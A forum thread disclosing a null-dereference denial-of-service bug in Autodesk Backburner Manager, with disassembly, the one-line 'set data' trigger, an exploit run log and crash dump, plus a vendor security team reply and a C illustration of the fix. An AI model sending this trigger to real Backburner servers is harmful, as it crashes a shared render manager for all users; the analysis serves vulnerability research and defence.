Thread: Autodesk BackBurner Null Dereference - Denial of Service

  1. #1
    b0nd (... I am no Expert, b0nd.g4h@gmail.com) - Join Date: Jul 2010 - Location: irc.freenode.net #g4h - Posts: 734

    Autodesk BackBurner Null Dereference - Denial of Service

    Autodesk BackBurner listens on TCP port 3234 and accepts a set of telnet commands from remote machines. For a particular command it fails to handle the request when an insufficient number of arguments is passed, which results in a Null Dereference crash leading to Denial of Service.

    Autodesk BackBurner Denial of Service (Null Dereference)


    AFFECTED SOFTWARE
    - Autodesk Backburner Manager 3
    - Version 2016.0.0.2150 and prior


    Download Link
    - https://knowledge.autodesk.com/suppo...-max-2016.html




    VULNERABILITY
    - The vulnerability exists in libDLnrapi30.dll, a Dynamic Link Library loaded by the Backburner Manager process manager.exe
    listening on TCP port 3234. The application does not check the number of arguments passed to a specific remote command and
    results in a Null Dereference leading to Denial of Service.




    Available Remote Commands:


    kali@kali:~/Desktop$ telnet 172.16.36.133 3234
    Trying 172.16.36.133...
    Connected to 172.16.36.133.
    Escape character is '^]'.
    250 backburner 1.0 Ready.
    backburner>help
    200 Help
    Available Commands:    Arguments:
    get {argument}         compress {on|off}
    set {argument}         data {xml|list}
    new {argument}         status
    del {argument}         prompt {on|off}
    kill                   updates {on|off}
    help                   mgrinfo
    exit                   cliinfo
                           controller
                           job
                           joblog
                           jobcount
                           jobstate
                           jobpriority
                           joblist
                           jobhlist
                           server
                           srvschedule
                           srvcount
                           srvstate
                           srvlist
    backburner>






    Vulnerable Code:


    With image base 0x10000000


    The following is the switch-case portion where the program determines which command is executed:
    .text:1005213D movzx ecx, ds:byte_100546B0[eax]
    .text:10052144 jmp ds:off_10054648[ecx*4] ; switch jump




    The following command, without any argument, leads to the crash:


    backburner>set data


    .text:1005221D
    .text:1005221D loc_1005221D: ; jumptable 10052144 case 2
    .text:1005221D mov eax, [ebx+74Ch]
    .text:10052223 mov ecx, [eax]
    .text:10052225 lea edx, [ebx+2FCh]
    .text:1005222B push edx
    .text:1005222C push 528h
    .text:10052231 push 10h
    .text:10052233 push eax
    .text:10052234 mov eax, [ecx+14h]
    .text:10052237 call eax
    .text:10052239 add esp, 10h
    .text:1005223C push esi
    .text:1005223D lea ecx, [ebx+768h]
    .text:10052243 call ??ACStr@BBString@@QAEAA_WH@Z ; This is the buggy function. It does nothing when no argument is passed with the command. The rest of the switch cases do take care of it.
    .text:10052248 xor ecx, ecx
    .text:1005224A cmp word ptr [eax], 78h ; Crash Point - null dereference
    .text:1005224E setnz cl
    .text:10052251 mov eax, ecx
    .text:10052253 mov [ebx+77Ch], eax
    .text:10052259 cmp eax, esi
    .text:1005225B jnz short loc_10052264




    Exploitation:




    kali@kali:~/Desktop$ python BackBurner-NullDereference.py --host 172.16.36.133
    remote_host: 172.16.36.133
    remote_port: 3234


    [+] Socket Created


    [+] Socket Connected to 172.16.36.133 on port 3234
    250 backburner 1.0 Ready.


    backburner>
    Set Data Command
    BackBurner Manager should have crashed




    (1500.1034): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=00f51758 ecx=00000000 edx=00000000 esi=00000000 edi=6e1cfe10
    eip=6dcb224a esp=0470cd0c ebp=0470cd60 iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
    *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Autodesk\Backburner\libDLnrapi30.dll -
    libDLnrapi30!nrCreateNetworkManager+0x1207a:
    6dcb224a 66833878 cmp word ptr [eax],78h ds:002b:00000000=????


    0:015> kb
    ChildEBP RetAddr Args to Child
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0470cd60 00000000 00000000 00000000 00000000 libDLnrapi30!nrCreateNetworkManager+0x1207a




    Impact:
    - Denial of Service to all users




    Vendor Patch:
    - No patch is available

    Rename exploit module from .txt to .py

    Cheers!
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious
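The defect described in the post is a missing argument-count check in one command handler: the `set data` case fetches the value token through a `BBString` accessor, and when the token is absent the returned pointer is NULL, so the `cmp word ptr [eax], 78h` (78h is the wide character `x`, i.e. the start of `xml`) faults. The following is an added illustration of that bug shape and its fix in C; it is not Autodesk's code and does not reproduce the Backburner protocol. Function names (`split_args`, `set_data_unchecked`, `set_data_checked`, `dispatch`), the `BB_BAD_ARGS` value 501 and the sample command lines are constructed for the example; only the `200` reply code and the `set data {xml|list}` syntax come from the post.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define MAX_ARGS 8

/* Reply codes: 200 mirrors the "200 Help" reply shown in the post;
   501 is a constructed placeholder for a syntax/argument error. */
enum { BB_OK = 200, BB_BAD_ARGS = 501 };

/* Split a command line into whitespace-separated tokens, in place.
   Returns the token count; unused argv slots are set to NULL so that a
   missing argument is observable as a NULL pointer, like the post's case. */
static int split_args(char *line, char *argv[], int max_args)
{
    int argc = 0;
    for (int i = 0; i < max_args; i++)
        argv[i] = NULL;
    for (char *tok = strtok(line, " \t\r\n");
         tok != NULL && argc < max_args;
         tok = strtok(NULL, " \t\r\n"))
        argv[argc++] = tok;
    return argc;
}

/* Buggy shape (illustration only, never called with a short line here):
   assumes the value token exists. With "set data" alone, argv[2] is NULL and
   the read of value[0] faults, the same way the word compare against 'x'
   does in the disassembly. */
int set_data_unchecked(char *argv[], int *use_xml)
{
    const char *value = argv[2];
    *use_xml = (value[0] == 'x');   /* NULL dereference when value is absent */
    return BB_OK;
}

/* Hardened shape: validate the argument count (and the pointer) before any
   dereference, and reject values outside the documented {xml|list} set. */
int set_data_checked(char *argv[], int argc, int *use_xml)
{
    if (argc < 3 || argv[2] == NULL)
        return BB_BAD_ARGS;
    if (strcmp(argv[2], "xml") == 0) { *use_xml = 1; return BB_OK; }
    if (strcmp(argv[2], "list") == 0) { *use_xml = 0; return BB_OK; }
    return BB_BAD_ARGS;
}

/* Dispatch one line the way the switch in the post does; only the
   "set data" case is modelled. Returns the reply code. */
int dispatch(const char *input, int *use_xml)
{
    char line[256];
    char *argv[MAX_ARGS];
    strncpy(line, input, sizeof line - 1);
    line[sizeof line - 1] = '\0';
    int argc = split_args(line, argv, MAX_ARGS);
    if (argc >= 2 && strcmp(argv[0], "set") == 0 && strcmp(argv[1], "data") == 0)
        return set_data_checked(argv, argc, use_xml);
    return BB_BAD_ARGS;
}

int main(void)
{
    /* Constructed sample lines, including the argument-less one from the post. */
    const char *samples[] = { "set data xml", "set data list", "set data", "set data json" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int use_xml = -1;
        int rc = dispatch(samples[i], &use_xml);
        printf("%-14s -> %d (use_xml=%d)\n", samples[i], rc, use_xml);
    }

    /* The unchecked handler is only safe on a complete line. */
    char ok_line[] = "set data xml";
    char *argv[MAX_ARGS];
    split_args(ok_line, argv, MAX_ARGS);
    int use_xml = -1;
    printf("unchecked on complete line -> %d (use_xml=%d)\n",
           set_data_unchecked(argv, &use_xml), use_xml);
    return 0;
}
```

The point of the checked version is that the count test happens before any token is touched; a server that reaches the `cmp` only after the accessor has confirmed the argument exists cannot be taken down by a short line, regardless of what the rest of the command table does.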

  2. #2

    Follow Up

    Thank you for the detailed report of your findings. While we investigate and work on any remediation, we would also like to understand if you had any experience notifying or attempting to contact Autodesk prior to posting the information here. If you are open to discussing privately, you may contact us directly at PSIRT@autodesk.com

    Regards,
    Product Security Incident Response Team (PSIRT)
    Autodesk, Inc.

  3. #3
    b0nd (... I am no Expert, b0nd.g4h@gmail.com) - Join Date: Jul 2010 - Location: irc.freenode.net #g4h - Posts: 734
    Quote Originally Posted by adsk_responder (reply #2 above)
    Hi,

    Based on the information available for CVE-2007-4749 http://cve.mitre.org/cgi-bin/cvename...=CVE-2007-4749 and CVE-2016-2344 https://www.kb.cert.org/vuls/id/732760 where patches were not released for software and users were advised to follow documentation that outlines the security risks of operating Backburner on untrusted networks, no attempt was made to contact Autodesk prior to posting the information here.

    Please feel free to discuss anything related to it.

    Cheers!
    b0nd